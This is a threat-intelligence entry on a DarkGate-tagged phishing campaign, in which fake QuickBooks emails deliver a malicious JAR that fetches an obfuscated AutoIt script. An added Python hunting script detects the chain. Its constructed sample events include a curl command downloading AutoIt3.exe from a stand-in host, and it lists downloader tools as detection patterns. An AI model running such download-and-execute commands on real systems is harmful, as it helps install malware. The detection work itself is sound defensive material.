From Document to Script: Insides of Campaign
Essential information
- Published: 17/05/2024 09:38
- Modified: 17/05/2024 10:03
- Tags: 2024-05-17, autoit, campaign, cybercrime, darkgate, java, malicious, obfuscation, payload, phishing
- Related entities: 11 observables, 1 intrusion set (APT), 9 techniques (MITRE ATT&CK), 1 malware
Description
This report examines a recent malicious campaign that starts with phishing emails purporting to come from QuickBooks and prompting the recipient to install Java. The embedded link does not deliver a Java installer; it downloads a malicious JAR file. The JAR contains commands that fetch further payloads, among them an obfuscated AutoIt script that establishes connections to remote servers, likely for command and control of the infected host. The campaign combines these multi-stage delivery techniques with URL patterns seen in earlier activity attributed to known threat actors; the entry is tagged darkgate.
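The chain above (JAR launched by the Java runtime, a follow-on download, then an AutoIt interpreter running a script) is the kind of parent-child process pattern a hunting query can pick out of endpoint telemetry. The following is an added example written for this page, not code from the report: it walks constructed, Sysmon-style process-creation events and flags the two stages. Everything it assumes is absent from the report and is labelled as an assumption in the code: that the JAR is started by java.exe or javaw.exe, that the download uses a built-in tool such as curl.exe or certutil.exe (possibly via cmd.exe), that the AutoIt stage runs as AutoIt3.exe with an .a3x or .au3 script argument, and all of the sample paths, PIDs and the example.invalid URL.

```python
"""Hunting check for the JAR -> downloader -> AutoIt chain. Added example, not
code from the report. Assumed (the report states none of this): the JAR runs
under java.exe/javaw.exe, the download uses a built-in tool, optionally via
cmd.exe, and the AutoIt stage is AutoIt3.exe executing an .a3x/.au3 script."""

JAVA_HOSTS = {"java.exe", "javaw.exe"}                      # assumption
DOWNLOADERS = {"curl.exe", "certutil.exe", "powershell.exe", "bitsadmin.exe"}  # assumption
AUTOIT_HOSTS = {"autoit3.exe"}                              # assumption
AUTOIT_SCRIPT_EXT = (".a3x", ".au3")                        # assumption

# Constructed process-creation events (simplified Sysmon Event ID 1 fields).
# PIDs, paths, file names and the example.invalid URL are made up.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 4200, "ppid": 4100, "image": r"C:\Program Files\Java\jre\bin\javaw.exe",
     "cmdline": r"javaw.exe -jar C:\Users\alice\Downloads\update.jar"},
    {"pid": 4300, "ppid": 4200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl -o C:\Users\alice\AppData\Local\Temp\a\AutoIt3.exe http://example.invalid/a"},
    {"pid": 4400, "ppid": 4300, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl -o C:\Users\alice\AppData\Local\Temp\a\AutoIt3.exe http://example.invalid/a"},
    {"pid": 4500, "ppid": 4300, "image": r"C:\Users\alice\AppData\Local\Temp\a\AutoIt3.exe",
     "cmdline": r"AutoIt3.exe C:\Users\alice\AppData\Local\Temp\a\script.a3x"},
    # Benign noise: a Java IDE spawning git, and a developer running AutoIt.
    {"pid": 5000, "ppid": 4100, "image": r"C:\Program Files\Java\jre\bin\javaw.exe",
     "cmdline": r"javaw.exe -jar C:\Tools\ide.jar"},
    {"pid": 5100, "ppid": 5000, "image": r"C:\Program Files\Git\cmd\git.exe",
     "cmdline": "git.exe status"},
    {"pid": 6000, "ppid": 4100, "image": r"C:\Program Files\AutoIt3\AutoIt3.exe",
     "cmdline": r"AutoIt3.exe C:\Dev\build.au3"},
]


def basename(path):
    """Case-folded file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestors(event, by_pid):
    """Yield parent, grandparent, ... until the chain leaves the data set.
    The visited set stops a loop if PID reuse made the tree cyclic."""
    seen = set()
    ppid = event["ppid"]
    while ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        parent = by_pid[ppid]
        yield parent
        ppid = parent["ppid"]


def hunt(events):
    """Return one finding per matched stage:
    java_spawns_downloader: a download tool whose parent is a Java runtime,
                            with cmd.exe tolerated as the only intermediary;
    autoit_under_java:      AutoIt3 running a script with a Java runtime
                            anywhere among its ancestors."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img = basename(e["image"])
        cmd = e["cmdline"].lower()
        if img in DOWNLOADERS:
            for a in ancestors(e, by_pid):
                if basename(a["image"]) in JAVA_HOSTS:
                    findings.append({"rule": "java_spawns_downloader",
                                     "pid": e["pid"], "java_pid": a["pid"]})
                    break
                if basename(a["image"]) != "cmd.exe":
                    break  # anything other than cmd.exe ends the lookup
        elif img in AUTOIT_HOSTS and cmd.endswith(AUTOIT_SCRIPT_EXT):
            for a in ancestors(e, by_pid):
                if basename(a["image"]) in JAVA_HOSTS:
                    findings.append({"rule": "autoit_under_java",
                                     "pid": e["pid"], "java_pid": a["pid"]})
                    break
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
```

Run against the constructed events, the check reports the curl.exe process (PID 4400) and the AutoIt3.exe process (PID 4500), both tied back to the javaw.exe instance that ran the JAR, and stays silent on the developer's IDE and the AutoIt build script. In a real deployment the downloader list and the tolerated intermediaries should be tuned to the environment, and a Java runtime launching anything from a user-writable directory is worth a lower-severity rule of its own.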